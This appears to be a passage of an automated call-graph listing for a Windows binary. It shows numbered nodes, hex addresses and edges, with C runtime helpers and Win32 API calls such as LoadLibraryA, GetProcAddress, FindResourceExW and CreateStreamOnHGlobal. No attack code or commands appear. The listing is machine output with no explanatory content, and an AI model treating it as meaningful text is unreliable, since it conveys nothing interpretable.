API calls 92764->92765 92770 5c617c Mailbox 92764->92770 92767 5c6048 92765->92767 92775 5c607e Mailbox 92767->92775 92854 5c61a6 92767->92854 92768 5c61a6 48 API calls 92768->92775 92769 5c614f 92769->92770 92771 5cce19 48 API calls 92769->92771 92770->92502 92773 5c6170 92771->92773 92772 5cce19 48 API calls 92772->92775 92774 5c64cf 48 API calls 92773->92774 92774->92770 92775->92768 92775->92769 92775->92770 92775->92772 92857 5c64cf 92775->92857 92880 5c41a9 92777->92880 92780 5c3a06 92780->92508 92783 632ff0 92785 5e1c9d _free 47 API calls 92783->92785 92786 632ffd 92785->92786 92787 5c4252 84 API calls 92786->92787 92788 633006 92787->92788 92788->92788 92790 5c6ef8 92789->92790 92791 5c622b 92789->92791 93350 5cdd47 48 API calls ___crtGetEnvironmentStringsW 92790->93350 92793 5c9048 92791->92793 92794 5df4ea 48 API calls 92793->92794 92795 5c6237 92794->92795 92795->92513 92797 5cd6f4 92796->92797 92798 5cd71b 92797->92798 93351 5cd764 55 API calls 92797->93351 92798->92516 92801 5cd654 92800->92801 92808 5cd67e 92800->92808 92802 5cd65b 92801->92802 92804 5cd6c2 92801->92804 92803 5cd666 92802->92803 92809 5cd6ab 92802->92809 93352 5cd9a0 53 API calls __cinit 92803->93352 92804->92809 93354 5ddce0 53 API calls 92804->93354 92808->92524 92809->92808 93353 5ddce0 53 API calls 92809->93353 92811 5c641f 92810->92811 92812 5c6406 92810->92812 92814 5c6a63 48 API calls 92811->92814 92813 5c6eed 48 API calls 92812->92813 92815 5c62d1 92813->92815 92814->92815 92816 5e0fa7 92815->92816 92817 5e1028 92816->92817 92818 5e0fb3 92816->92818 93357 5e103a 59 API calls 3 library calls 92817->93357 92825 5e0fd8 92818->92825 93355 5e7c0e 47 API calls __getptd_noexit 92818->93355 92821 5e1035 92821->92530 92822 5e0fbf 93356 5e6e10 8 API calls __beginthread 92822->93356 92824 5e0fca 92824->92530 92825->92530 92827 5dc064 92826->92827 92829 5dc069 Mailbox 92826->92829 93358 5dc1af 48 API calls 92827->93358 92830 5dc077 92829->92830 93359 5dc15c 48 API calls 92829->93359 92832 5df4ea 48 API calls 92830->92832 92833 5dc152 92830->92833 92834 5dc108 92832->92834 92833->92562 92835 5df4ea 48 API calls 92834->92835 92836 5dc113 92835->92836 92836->92562 92836->92836 92838 5d1cf6 92837->92838 92840 5d1ba2 92837->92840 92838->92569 92839 5d1bae 92847 5d1bb9 92839->92847 93361 5dc15c 48 API calls 92839->93361 92840->92839 92842 5df4ea 48 API calls 92840->92842 92843 6349c4 92842->92843 92845 5df4ea 48 API calls 92843->92845 92844 5d1c5d 92844->92569 92852 6349cf 92845->92852 92846 5df4ea 48 API calls 92848 5d1c9f 92846->92848 92847->92844 92847->92846 92849 5d1cb2 92848->92849 93360 5c2925 48 API calls 92848->93360 92849->92569 92851 5df4ea 48 API calls 92851->92852 92852->92839 92852->92851 92853->92569 92863 5cbdfa 92854->92863 92856 5c61b1 92856->92767 92858 5c651b 92857->92858 92862 5c64dd ___crtGetEnvironmentStringsW 92857->92862 92860 5df4ea 48 API calls 92858->92860 92859 5df4ea 48 API calls 92861 5c64e4 92859->92861 92860->92862 92861->92775 92862->92859 92864 5cbe0d 92863->92864 92868 5cbe0a ___crtGetEnvironmentStringsW 92863->92868 92865 5df4ea 48 API calls 92864->92865 92866 5cbe17 92865->92866 92869 5dee75 92866->92869 92868->92856 92871 5df4ea __calloc_impl 92869->92871 92870 5e395c _W_store_winword 47 API calls 92870->92871 92871->92870 92872 5df50c 92871->92872 92873 5df50e std::exception::exception 92871->92873 92872->92868 92878 5e6805 RaiseException 92873->92878 92875 5df538 92879 5e673b 47 API calls _free 92875->92879 92877 5df54a 92877->92868 92878->92875 92879->92877 92945 5c4214 92880->92945 92885 634f73 92888 5c4252 84 API calls 92885->92888 92886 5c41d4 LoadLibraryExW 92955 5c4291 92886->92955 92889 634f7a 92888->92889 92891 5c4291 3 API calls 92889->92891 92893 634f82 92891->92893 92981 5c44ed 92893->92981 92894 5c41fb 92894->92893 92895 5c4207 92894->92895 92897 5c4252 84 API calls 92895->92897 92899 5c39fe 92897->92899 92899->92780 92904 60c396 92899->92904 92901 634fa9 92989 5c4950 92901->92989 92903 634fb6 92905 5c4517 83 API calls 92904->92905 92906 60c405 92905->92906 93170 60c56d 92906->93170 92909 5c44ed 64 API calls 92910 60c432 92909->92910 92911 5c44ed 64 API calls 92910->92911 92912 60c442 92911->92912 92913 5c44ed 64 API calls 92912->92913 92914 60c45d 92913->92914 92915 5c44ed 64 API calls 92914->92915 92916 60c478 92915->92916 92917 5c4517 83 API calls 92916->92917 92918 60c48f 92917->92918 92919 5e395c _W_store_winword 47 API calls 92918->92919 92920 60c496 92919->92920 92921 5e395c _W_store_winword 47 API calls 92920->92921 92922 60c4a0 92921->92922 92923 5c44ed 64 API calls 92922->92923 92924 60c4b4 92923->92924 92925 60bf5a GetSystemTimeAsFileTime 92924->92925 92926 60c4c7 92925->92926 92927 60c4f1 92926->92927 92928 60c4dc 92926->92928 92930 60c556 92927->92930 92931 60c4f7 92927->92931 92929 5e1c9d _free 47 API calls 92928->92929 92932 60c4e2 92929->92932 92934 5e1c9d _free 47 API calls 92930->92934 93176 60b965 92931->93176 92936 5e1c9d _free 47 API calls 92932->92936 92935 60c41b 92934->92935 92935->92783 92939 5c4252 92935->92939 92936->92935 92938 5e1c9d _free 47 API calls 92938->92935 92940 5c425c 92939->92940 92941 5c4263 92939->92941 92942 5e35e4 __fcloseall 83 API calls 92940->92942 92943 5c4272 92941->92943 92944 5c4283 FreeLibrary 92941->92944 92942->92941 92943->92783 92944->92943 92994 5c4339 92945->92994 92947 5c423c 92950 5c41bb 92947->92950 92951 5c4244 FreeLibrary 92947->92951 92952 5e3499 92950->92952 92951->92950 93002 5e34ae 92952->93002 92954 5c41c8 92954->92885 92954->92886 93081 5c42e4 92955->93081 92958 5c42b8 92959 5c41ec 92958->92959 92960 5c42c1 FreeLibrary 92958->92960 92962 5c4380 92959->92962 92960->92959 92963 5df4ea 48 API calls 92962->92963 92964 5c4395 92963->92964 93089 5c47b7 92964->93089 92966 5c43a1 ___crtGetEnvironmentStringsW 92967 5c43dc 92966->92967 92968 5c4499 92966->92968 92969 5c44d1 92966->92969 92970 5c4950 57 API calls 92967->92970 93092 5c406b CreateStreamOnHGlobal 92968->93092 93103 60c750 93 API calls 92969->93103 92978 5c43e5 92970->92978 92973 5c44ed 64 API calls 92973->92978 92974 5c4479 92974->92894 92976 634ed7 92977 5c4517 83 API calls 92976->92977 92979 634eeb 92977->92979 92978->92973 92978->92974 92978->92976 93098 5c4517 92978->93098 92980 5c44ed 64 API calls 92979->92980 92980->92974 92982 634fc0 92981->92982 92983 5c44ff 92981->92983 93127 5e381e 92983->93127 92986 60bf5a 93147 60bdb4 92986->93147 92988 60bf70 92988->92901 92990 635002 92989->92990 92991 5c495f 92989->92991 93152 5e3e65 92991->93152 92993 5c4967 92993->92903 92998 5c434b 92994->92998 92997 5c4321 LoadLibraryA GetProcAddress 92997->92947 92999 5c422f 92998->92999 93000 5c4354 LoadLibraryA 92998->93000 92999->92947 92999->92997 93000->92999 93001 5c4365 GetProcAddress 93000->93001 93001->92999 93005 5e34ba __getstream 93002->93005 93003 5e34cd 93050 5e7c0e 47 API calls __getptd_noexit 93003->93050 93005->93003 93007 5e34fe 93005->93007 93006 5e34d2 93051 5e6e10 8 API calls __beginthread 93006->93051 93021 5ee4c8 93007->93021 93010 5e3503 93011 5e350c 93010->93011 93012 5e3519 93010->93012 93052 5e7c0e 47 API calls __getptd_noexit 93011->93052 93014 5e3543 93012->93014 93015 5e3523 93012->93015 93035 5ee5e0 93014->93035 93053 5e7c0e 47 API calls __getptd_noexit 93015->93053 93016 5e34dd @_EH4_CallFilterFunc@8 __getstream 93016->92954 93022 5ee4d4 __getstream 93021->93022 93023 5e7cf4 __lock 47 API calls 93022->93023 93033 5ee4e2 93023->93033 93024 5ee552 93055 5ee5d7 93024->93055 93025 5ee559 93060 5e69d0 47 API calls _W_store_winword 93025->93060 93028 5ee560 93028->93024 93030 5ee56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93028->93030 93029 5ee5cc __getstream 93029->93010 93030->93024 93031 5e7d7c __mtinitlocknum 47 API calls 93031->93033 93033->93024 93033->93025 93033->93031 93058 5e4e5b 48 API calls __lock 93033->93058 93059 5e4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93033->93059 93037 5ee600 __wopenfile 93035->93037 93036 5ee61a 93065 5e7c0e 47 API calls __getptd_noexit 93036->93065 93037->93036 93049 5ee7d5 93037->93049 93067 5e185b 59 API calls 2 library calls 93037->93067 93039 5ee61f 93066 5e6e10 8 API calls __beginthread 93039->93066 93041 5ee838 93062 5f63c9 93041->93062 93042 5e354e 93054 5e3570 LeaveCriticalSection LeaveCriticalSection _fprintf 93042->93054 93045 5ee7ce 93045->93049 93068 5e185b 59 API calls 2 library calls 93045->93068 93047 5ee7ed 93047->93049 93069 5e185b 59 API calls 2 library calls 93047->93069 93049->93036 93049->93041 93050->93006 93051->93016 93052->93016 93053->93016 93054->93016 93061 5e7e58 LeaveCriticalSection 93055->93061 93057 5ee5de 93057->93029 93058->93033 93059->93033 93060->93028 93061->93057 93070 5f5bb1 93062->93070 93064 5f63e2 93064->93042 93065->93039 93066->93042 93067->93045 93068->93047 93069->93049 93071 5f5bbd __getstream 93070->93071 93072 5f5bcf 93071->93072 93075 5f5c06 93071->93075 93073 5e7c0e __beginthread 47 API calls 93072->93073 93074 5f5bd4 93073->93074 93076 5e6e10 __beginthread 8 API calls 93074->93076 93077 5f5c78 __wsopen_helper 110 API calls 93075->93077 93080 5f5bde __getstream 93076->93080 93078 5f5c23 93077->93078 93079 5f5c4c __wsopen_helper LeaveCriticalSection 93078->93079 93079->93080 93080->93064 93085 5c42f6 93081->93085 93084 5c42cc LoadLibraryA GetProcAddress 93084->92958 93086 5c42aa 93085->93086 93087 5c42ff LoadLibraryA 93085->93087 93086->92958 93086->93084 93087->93086 93088 5c4310 GetProcAddress 93087->93088 93088->93086 93090 5df4ea 48 API calls 93089->93090 93091 5c47c9 93090->93091 93091->92966 93093 5c4085 FindResourceExW 93092->93093 93097 5c40a2 93092->93097 93094 634f16 LoadResource 93093->93094 93093->93097 93095 634f2b SizeofResource 93094->93095 93094->93097 93096 634f3f LockResource 93095->93096 93095->93097 93096->93097 93097->92967 93099 634fe0 93098->93099 93100 5c4526 93098->93100 93104 5e3a8d 93100->93104 93102 5c4534 93102->92978 93103->92967 93107 5e3a99 __getstream 93104->93107 93105 5e3aa7 93117 5e7c0e 47 API calls __getptd_noexit 93105->93117 93106 5e3acd 93119 5e4e1c 93106->93119 93107->93105 93107->93106 93109 5e3aac 93118 5e6e10 8 API calls __beginthread 93109->93118 93112 5e3ad3 93125 5e39fe 81 API calls 5 library calls 93112->93125 93114 5e3ae2 93126 5e3b04 LeaveCriticalSection LeaveCriticalSection _fprintf 93114->93126 93116 5e3ab7 __getstream 93116->93102 93117->93109 93118->93116 93120 5e4e4e EnterCriticalSection 93119->93120 93121 5e4e2c 93119->93121 93123 5e4e44 93120->93123 93121->93120 93122 5e4e34 93121->93122 93124 5e7cf4 __lock 47 API calls 93122->93124 93123->93112 93124->93123 93125->93114 93126->93116 93130 5e3839 93127->93130 93129 5c4510 93129->92986 93131 5e3845 __getstream 93130->93131 93132 5e3888 93131->93132 93133 5e3880 __getstream 93131->93133 93135 5e385b _memset 93131->93135 93134 5e4e1c __lock_file 48 API calls 93132->93134 93133->93129 93137 5e388e 93134->93137 93143 5e7c0e 47 API calls __getptd_noexit 93135->93143 93145 5e365b 62 API calls 5 library calls 93137->93145 93139 5e3875 93144 5e6e10 8 API calls __beginthread 93139->93144 93140 5e38a4 93146 5e38c2 LeaveCriticalSection LeaveCriticalSection _fprintf 93140->93146 93143->93139 93144->93133 93145->93140 93146->93133 93150 5e344a GetSystemTimeAsFileTime 93147->93150 93149 60bdc3 93149->92988 93151 5e3478 __aulldiv 93150->93151 93151->93149 93153 5e3e71 __getstream 93152->93153 93154 5e3e7f 93153->93154 93155 5e3e94 93153->93155 93166 5e7c0e 47 API calls __getptd_noexit 93154->93166 93157 5e4e1c __lock_file 48 API calls 93155->93157 93159 5e3e9a 93157->93159 93158 5e3e84 93167 5e6e10 8 API calls __beginthread 93158->93167 93168 5e3b0c 55 API calls 6 library calls 93159->93168 93162 5e3ea5 93169 5e3ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 93162->93169 93164 5e3eb7 93165 5e3e8f __getstream 93164->93165 93165->92993 93166->93158 93167->93165 93168->93162 93169->93164 93171 60c581 __tzset_nolock _wcscmp 93170->93171 93172 5c44ed 64 API calls 93171->93172 93173 60c417 93171->93173 93174 60bf5a GetSystemTimeAsFileTime 93171->93174 93175 5c4517 83 API calls 93171->93175 93172->93171 93173->92909 93173->92935 93174->93171 93175->93171 93177 60b970 93176->93177 93178 60b97e 93176->93178 93179 5e3499 117 API calls 93177->93179 93180 60b9c3 93178->93180 93181 5e3499 117 API calls 93178->93181 93192 60b987 93178->93192 93179->93178 93207 60bbe8 64 API calls 3 library calls 93180->93207 93183 60b9a8 93181->93183 93183->93180 93185 60b9b1 93183->93185 93184 60ba07 93186 60ba0b 93184->93186 93187 60ba2c 93184->93187 93185->93192 93218 5e35e4 93185->93218 93188 60ba18 93186->93188 93191 5e35e4 __fcloseall 83 API calls 93186->93191 93208 60b7e5 47 API calls _W_store_winword 93187->93208 93188->93192 93196 5e35e4 __fcloseall 83 API calls 93188->93196 93191->93188 93192->92938 93193 60ba34 93194 60ba5a 93193->93194 93195 60ba3a 93193->93195 93209 60ba8a 90 API calls 93194->93209 93197 60ba47 93195->93197 93199 5e35e4 __fcloseall 83 API calls 93195->93199 93196->93192 93197->93192 93201 5e35e4 __fcloseall 83 API calls 93197->93201 93199->93197 93200 60ba61 93210 60bb64 93200->93210 93201->93192 93204 60ba75 93204->93192 93206 5e35e4 __fcloseall 83 API calls 93204->93206 93205 5e35e4 __fcloseall 83 API calls 93205->93204 93206->93192 93207->93184 93208->93193 93209->93200 93211 60bb71 93210->93211 93213 60bb77 93210->93213 93212 5e1c9d _free 47 API calls 93211->93212 93212->93213 93214 60bb88 93213->93214 93215 5e1c9d _free 47 API calls 93213->93215 93216 60ba68 93214->93216 93217 5e1c9d _free 47 API calls 93214->93217 93215->93214 93216->93204 93216->93205 93217->93216 93219 5e35f0 __getstream 93218->93219 93220 5e361c 93219->93220 93221 5e3604 93219->93221 93223 5e4e1c __lock_file 48 API calls 93220->93223 93228 5e3614 __getstream 93220->93228 93247 5e7c0e 47 API calls __getptd_noexit 93221->93247 93225 5e362e 93223->93225 93224 5e3609 93248 5e6e10 8 API calls __beginthread 93224->93248 93231 5e3578 93225->93231 93228->93192 93232 5e3587 93231->93232 93235 5e359b 93231->93235 93290 5e7c0e 47 API calls __getptd_noexit 93232->93290 93234 5e3597 93249 5e3653 LeaveCriticalSection LeaveCriticalSection _fprintf 93234->93249 93235->93234 93250 5e2c84 93235->93250 93236 5e358c 93291 5e6e10 8 API calls __beginthread 93236->93291 93243 5e35b5 93267 5ee9d2 93243->93267 93245 5e35bb 93245->93234 93246 5e1c9d _free 47 API calls 93245->93246 93246->93234 93247->93224 93248->93228 93249->93228 93251 5e2c97 93250->93251 93255 5e2cbb 93250->93255 93252 5e2933 __stbuf 47 API calls 93251->93252 93251->93255 93253 5e2cb4 93252->93253 93292 5eaf61 93253->93292 93256 5eeb36 93255->93256 93257 5e35af 93256->93257 93258 5eeb43 93256->93258 93260 5e2933 93257->93260 93258->93257 93259 5e1c9d _free 47 API calls 93258->93259 93259->93257 93261 5e293d 93260->93261 93262 5e2952 93260->93262 93317 5e7c0e 47 API calls __getptd_noexit 93261->93317 93262->93243 93264 5e2942 93318 5e6e10 8 API calls __beginthread 93264->93318 93266 5e294d 93266->93243 93268 5ee9de __getstream 93267->93268 93269 5ee9fe 93268->93269 93270 5ee9e6 93268->93270 93271 5eea7b 93269->93271 93276 5eea28 93269->93276 93343 5e7bda 47 API calls __getptd_noexit 93270->93343 93347 5e7bda 47 API calls __getptd_noexit 93271->93347 93273 5ee9eb 93344 5e7c0e 47 API calls __getptd_noexit 93273->93344 93275 5eea80 93348 5e7c0e 47 API calls __getptd_noexit 93275->93348 93319 5ea8ed 93276->93319 93280 5eea88 93349 5e6e10 8 API calls __beginthread 93280->93349 93281 5eea2e 93283 5eea4c 93281->93283 93284 5eea41 93281->93284 93345 5e7c0e 47 API calls __getptd_noexit 93283->93345 93328 5eea9c 93284->93328 93286 5ee9f3 __getstream 93286->93245 93288 5eea47 93346 5eea73 LeaveCriticalSection __unlock_fhandle 93288->93346 93290->93236 93291->93234 93293 5eaf6d __getstream 93292->93293 93294 5eaf8d 93293->93294 93295 5eaf75 93293->93295 93297 5eb022 93294->93297 93301 5eafbf 93294->93301 93296 5e7bda __set_osfhnd 47 API calls 93295->93296 93298 5eaf7a 93296->93298 93299 5e7bda __set_osfhnd 47 API calls 93297->93299 93300 5e7c0e __beginthread 47 API calls 93298->93300 93302 5eb027 93299->93302 93313 5eaf82 __getstream 93300->93313 93303 5ea8ed ___lock_fhandle 49 API calls 93301->93303 93304 5e7c0e __beginthread 47 API calls 93302->93304 93305 5eafc5 93303->93305 93306 5eb02f 93304->93306 93307 5eafeb 93305->93307 93308 5eafd8 93305->93308 93309 5e6e10 __beginthread 8 API calls 93306->93309 93311 5e7c0e __beginthread 47 API calls 93307->93311 93310 5eb043 __chsize_nolock 75 API calls 93308->93310 93309->93313 93312 5eafe4 93310->93312 93314 5eaff0 93311->93314 93316 5eb01a __flush LeaveCriticalSection 93312->93316 93313->93255 93315 5e7bda __set_osfhnd 47 API calls 93314->93315 93315->93312 93316->93313 93317->93264 93318->93266 93320 5ea8f9 __getstream 93319->93320 93321 5ea946 EnterCriticalSection 93320->93321 93322 5e7cf4 __lock 47 API calls 93320->93322 93323 5ea96c __getstream 93321->93323 93324 5ea91d 93322->93324 93323->93281 93325 5ea93a 93324->93325 93326 5ea928 InitializeCriticalSectionAndSpinCount 93324->93326 93327 5ea970 ___lock_fhandle LeaveCriticalSection 93325->93327 93326->93325 93327->93321 93329 5eaba4 __lseeki64_nolock 47 API calls 93328->93329 93331 5eeaaa 93329->93331 93330 5eeb00 93333 5eab1e __free_osfhnd 48 API calls 93330->93333 93331->93330 93332 5eeade 93331->93332 93335 5eaba4 __lseeki64_nolock 47 API calls 93331->93335 93332->93330 93336 5eaba4 __lseeki64_nolock 47 API calls 93332->93336 93334 5eeb08 93333->93334 93337 5eeb2a 93334->93337 93340 5e7bed __dosmaperr 47 API calls 93334->93340 93338 5eead5 93335->93338 93339 5eeaea CloseHandle 93336->93339 93337->93288 93341 5eaba4 __lseeki64_nolock 47 API calls 93338->93341 93339->93330 93342 5eeaf6 GetLastError 93339->93342 93340->93337 93341->93332 93342->93330 93343->93273 93344->93286 93345->93288 93346->93286 93347->93275 93348->93280 93349->93286 93350->92791 93351->92798 93352->92808 93353->92808 93354->92809 93355->92822 93356->92824 93357->92821 93358->92829 93359->92830 93360->92849 93361->92847 93421 5ef8a0 93362->93421 93365 5c6a63 48 API calls 93366 5c6643 93365->93366 93423 5c6571 93366->93423 93369 5c40a7 93370 5ef8a0 __ftell_nolock 93369->93370 93371 5c40b4 GetLongPathNameW 93370->93371 93372 5c6a63 48 API calls 93371->93372 93373 5c40dc 93372->93373 93374 5c49a0 93373->93374 93375 5cd7f7 48 API calls 93374->93375 93376 5c49b2 93375->93376 93377 5c660f 49 API calls 93376->93377 93378 5c49bd 93377->93378 93379 5c49c8 93378->93379 93380 632e35 93378->93380 93381 5c64cf 48 API calls 93379->93381 93384 632e4f 93380->93384 93437 5dd35e 60 API calls 93380->93437 93383 5c49d4 93381->93383 93431 5c28a6 93383->93431 93386 5c49e7 Mailbox 93386->92585 93388 5c41a9 136 API calls 93387->93388 93389 5c415e 93388->93389 93390 633489 93389->93390 93392 5c41a9 136 API calls 93389->93392 93391 60c396 122 API calls 93390->93391 93393 63349e 93391->93393 93394 5c4172 93392->93394 93395 6334a2 93393->93395 93396 6334bf 93393->93396 93394->93390 93397 5c417a 93394->93397 93398 5c4252 84 API calls 93395->93398 93399 5df4ea 48 API calls 93396->93399 93400 6334aa 93397->93400 93401 5c4186 93397->93401 93398->93400 93420 633504 Mailbox 93399->93420 93525 606b49 87 API calls _wprintf 93400->93525 93438 5cc833 93401->93438 93405 6334b8 93405->93396 93406 6336b4 93407 5e1c9d _free 47 API calls 93406->93407 93408 6336bc 93407->93408 93409 5c4252 84 API calls 93408->93409 93414 6336c5 93409->93414 93413 5e1c9d _free 47 API calls 93413->93414 93414->93413 93416 5c4252 84 API calls 93414->93416 93531 6025b5 86 API calls 4 library calls 93414->93531 93416->93414 93417 5cce19 48 API calls 93417->93420 93420->93406 93420->93414 93420->93417 93526 602551 48 API calls ___crtGetEnvironmentStringsW 93420->93526 93527 602472 60 API calls 2 library calls 93420->93527 93528 609c12 48 API calls 93420->93528 93529 5cba85 48 API calls ___crtGetEnvironmentStringsW 93420->93529 93530 5c4dd9 48 API calls 93420->93530 93422 5c661c GetFullPathNameW 93421->93422 93422->93365 93424 5c657f 93423->93424 93427 5cb18b 93424->93427 93426 5c4114 93426->93369 93428 5cb1a2 ___crtGetEnvironmentStringsW 93427->93428 93429 5cb199 93427->93429 93428->93426 93429->93428 93430 5cbdfa 48 API calls 93429->93430 93430->93428 93432 5c28b8 93431->93432 93436 5c28d7 ___crtGetEnvironmentStringsW 93431->93436 93435 5df4ea 48 API calls 93432->93435 93433 5df4ea 48 API calls 93434 5c28ee 93433->93434 93434->93386 93435->93436 93436->93433 93437->93380 93439 5cc843 __ftell_nolock 93438->93439 93440 633095 93439->93440 93441 5cc860 93439->93441 93556 6025b5 86 API calls 4 library calls 93440->93556 93537 5c48ba 49 API calls 93441->93537 93444 6330a8 93557 6025b5 86 API calls 4 library calls 93444->93557 93445 5cc882 93538 5c4550 56 API calls 93445->93538 93447 5cc897 93447->93444 93449 5cc89f 93447->93449 93451 5cd7f7 48 API calls 93449->93451 93450 6330c4 93454 5cc90c 93450->93454 93452 5cc8ab 93451->93452 93539 5de968 49 API calls __ftell_nolock 93452->93539 93456 6330d7 93454->93456 93457 5cc91a 93454->93457 93455 5cc8b7 93458 5cd7f7 48 API calls 93455->93458 93460 5c4907 CloseHandle 93456->93460 93542 5e1dfc 93457->93542 93462 5cc8c3 93458->93462 93461 6330e3 93460->93461 93463 5c41a9 136 API calls 93461->93463 93464 5c660f 49 API calls 93462->93464 93465 63310d 93463->93465 93466 5cc8d1 93464->93466 93468 633136 93465->93468 93471 60c396 122 API calls 93465->93471 93540 5deb66 SetFilePointerEx ReadFile 93466->93540 93467 5cc943 _wcscat _wcscpy 93470 5cc96d SetCurrentDirectoryW 93467->93470 93558 6025b5 86 API calls 4 library calls 93468->93558 93474 5df4ea 48 API calls 93470->93474 93475 633129 93471->93475 93472 5cc8fd 93541 5c46ce SetFilePointerEx SetFilePointerEx 93472->93541 93477 5cc988 93474->93477 93478 633152 93475->93478 93479 633131 93475->93479 93480 5c47b7 48 API calls 93477->93480 93482 5c4252 84 API calls 93478->93482 93481 5c4252 84 API calls 93479->93481 93513 5cc993 Mailbox __NMSG_WRITE 93480->93513 93481->93468 93483 633157 93482->93483 93484 5df4ea 48 API calls 93483->93484 93491 633194 93484->93491 93485 5cca9d 93552 5c4907 93485->93552 93489 5ccaa9 SetCurrentDirectoryW 93511 5ccad1 Mailbox 93489->93511 93490 5c3d98 93490->92446 93490->92455 93559 5cba85 48 API calls ___crtGetEnvironmentStringsW 93491->93559 93495 6333ce 93565 609b72 48 API calls 93495->93565 93496 633467 93569 6025b5 86 API calls 4 library calls 93496->93569 93499 633480 93499->93485 93501 6333f0 93566 6229e8 48 API calls ___crtGetEnvironmentStringsW 93501->93566 93503 6333fd 93506 5e1c9d _free 47 API calls 93503->93506 93505 63345f 93568 60240b 48 API calls 3 library calls 93505->93568 93506->93511 93507 5cce19 48 API calls 93507->93513 93532 5c48dd 93511->93532 93513->93485 93513->93496 93513->93505 93513->93507 93545 5cb337 56 API calls _wcscpy 93513->93545 93546 5dc258 GetStringTypeW 93513->93546 93547 5ccb93 59 API calls __wcsnicmp 93513->93547 93548 5ccb5a GetStringTypeW __NMSG_WRITE 93513->93548 93549 5e16d0 GetStringTypeW __wtof_l 93513->93549 93550 5ccc24 162 API calls 3 library calls 93513->93550 93551 5dc682 48 API calls 93513->93551 93516 5cce19 48 API calls 93522 6331dd Mailbox 93516->93522 93519 633420 93567 6025b5 86 API calls 4 library calls 93519->93567 93521 633439 93523 5e1c9d _free 47 API calls 93521->93523 93522->93495 93522->93516 93522->93519 93560 602551 48 API calls ___crtGetEnvironmentStringsW 93522->93560 93561 602472 60 API calls 2 library calls 93522->93561 93562 609c12 48 API calls 93522->93562 93563 5cba85 48 API calls ___crtGetEnvironmentStringsW 93522->93563 93564 5dc682 48 API calls 93522->93564 93524 63314d 93523->93524 93524->93511 93525->93405 93526->93420 93527->93420 93528->93420 93529->93420 93530->93420 93531->93414 93533 5c4907 CloseHandle 93532->93533 93534 5c48e5 Mailbox 93533->93534 93535 5c4907 CloseHandle 93534->93535 93536 5c48fc 93535->93536 93536->93490 93537->93445 93538->93447 93539->93455 93540->93472 93541->93454 93570 5e1e46 93542->93570 93545->93513 93546->93513 93547->93513 93548->93513 93549->93513 93550->93513 93551->93513 93553 5c4920 93552->93553 93554 5c4911 93552->93554 93553->93554 93555 5c4925 CloseHandle 93553->93555 93554->93489 93555->93554 93556->93444 93557->93450 93558->93524 93559->93522 93560->93522 93561->93522 93562->93522 93563->93522 93564->93522 93565->93501 93566->93503 93567->93521 93568->93496 93569->93499 93571 5e1e55 93570->93571 93572 5e1e61 93570->93572 93571->93572 93584 5e1ed4 93571->93584 93589 5e9d6b 47 API calls __beginthread 93571->93589 93594 5e7c0e 47 API calls __getptd_noexit 93572->93594 93574 5e2019 93578 5e1e41 93574->93578 93595 5e6e10 8 API calls __beginthread 93574->93595 93577 5e1fa0 93577->93572 93577->93578 93580 5e1fb0 93577->93580 93578->93467 93579 5e1f5f 93579->93572 93581 5e1f7b 93579->93581 93591 5e9d6b 47 API calls __beginthread 93579->93591 93593 5e9d6b 47 API calls __beginthread 93580->93593 93581->93572 93581->93578 93583 5e1f91 93581->93583 93592 5e9d6b 47 API calls __beginthread 93583->93592 93584->93572 93588 5e1f41 93584->93588 93590 5e9d6b 47 API calls __beginthread 93584->93590 93588->93577 93588->93579 93589->93584 93590->93588 93591->93581 93592->93578 93593->93578 93594->93574 93595->93578 93597 5df4ea 48 API calls 93596->93597 93598 5c6b54 93597->93598 93598->92596 93599->92597 93601 5c4c8b 93600->93601 93602 5c4d94 93600->93602 93601->93602 93603 5df4ea 48 API calls 93601->93603 93602->92602 93604 5c4cb2 93603->93604 93605 5df4ea 48 API calls 93604->93605 93606 5c4d22 93605->93606 93606->93602 93613 5cb470 93606->93613 93641 5c4dd9 48 API calls 93606->93641 93642 609af1 48 API calls 93606->93642 93643 5cba85 48 API calls ___crtGetEnvironmentStringsW 93606->93643 93611->92605 93612->92607 93644 5c6b0f 93613->93644 93615 5cb69b 93656 5cba85 48 API calls ___crtGetEnvironmentStringsW 93615->93656 93617 5cb6b5 Mailbox 93617->93606 93620 5cb495 93620->93615 93621 633939 ___crtGetEnvironmentStringsW 93620->93621 93622 5cbcce 48 API calls 93620->93622 93623 63397b 93620->93623 93626 5cb9e4 93620->93626 93629 5cba85 48 API calls 93620->93629 93633 633909 93620->93633 93638 5cbdfa 48 API calls 93620->93638 93649 5cc413 59 API calls 93620->93649 93650 5cbb85 93620->93650 93655 5cbc74 48 API calls 93620->93655 93657 5cc6a5 49 API calls 93620->93657 93658 5cc799 93620->93658 93666 6026bc 88 API calls 4 library calls 93621->93666 93622->93620 93667 6026bc 88 API calls 4 library calls 93623->93667 93669 6026bc 88 API calls 4 library calls 93626->93669 93627 633973 93627->93617 93629->93620 93631 633989 93668 5cba85 48 API calls ___crtGetEnvironmentStringsW 93631->93668 93635 5c6b4a 48 API calls 93633->93635 93637 633914 93635->93637 93640 5df4ea 48 API calls 93637->93640 93639 5cb66c CharUpperBuffW 93638->93639 93639->93620 93640->93621 93641->93606 93642->93606 93643->93606 93645 5df4ea 48 API calls 93644->93645 93646 5c6b34 93645->93646 93647 5c6b4a 48 API calls 93646->93647 93648 5c6b43 93647->93648 93648->93620 93649->93620 93652 5cbb9b 93650->93652 93654 5cbb96 ___crtGetEnvironmentStringsW 93650->93654 93651 631b77 93652->93651 93653 5dee75 48 API calls 93652->93653 93653->93654 93654->93620 93655->93620 93656->93617 93657->93620 93659 631f17 93658->93659 93662 5cc7b0 93658->93662 93660 5c6b4a 48 API calls 93659->93660 93661 631f21 93660->93661 93664 5df4ea 48 API calls 93661->93664 93663 5cc7bd ___crtGetEnvironmentStringsW 93662->93663 93665 5dee75 48 API calls 93662->93665 93663->93620 93664->93663 93665->93663 93666->93627 93667->93631 93668->93627 93669->93627 93671 5c403c LoadImageW 93670->93671 93672 63418d EnumResourceNamesW 93670->93672 93673 5c3ee1 RegisterClassExW 93671->93673 93672->93673 93674 5c3f53 7 API calls 93673->93674 93674->92621 93676 633c33 93675->93676 93677 5c4c44 93675->93677 93676->93677 93678 633c3c DestroyIcon 93676->93678 93677->92627 93701 605819 61 API calls _W_store_winword 93677->93701 93678->93677 93680 5c51cb 93679->93680 93681 5c52a2 Mailbox 93679->93681 93682 5c6b0f 48 API calls 93680->93682 93681->92632 93683 5c51d9 93682->93683 93684 633ca1 LoadStringW 93683->93684 93685 5c51e6 93683->93685 93688 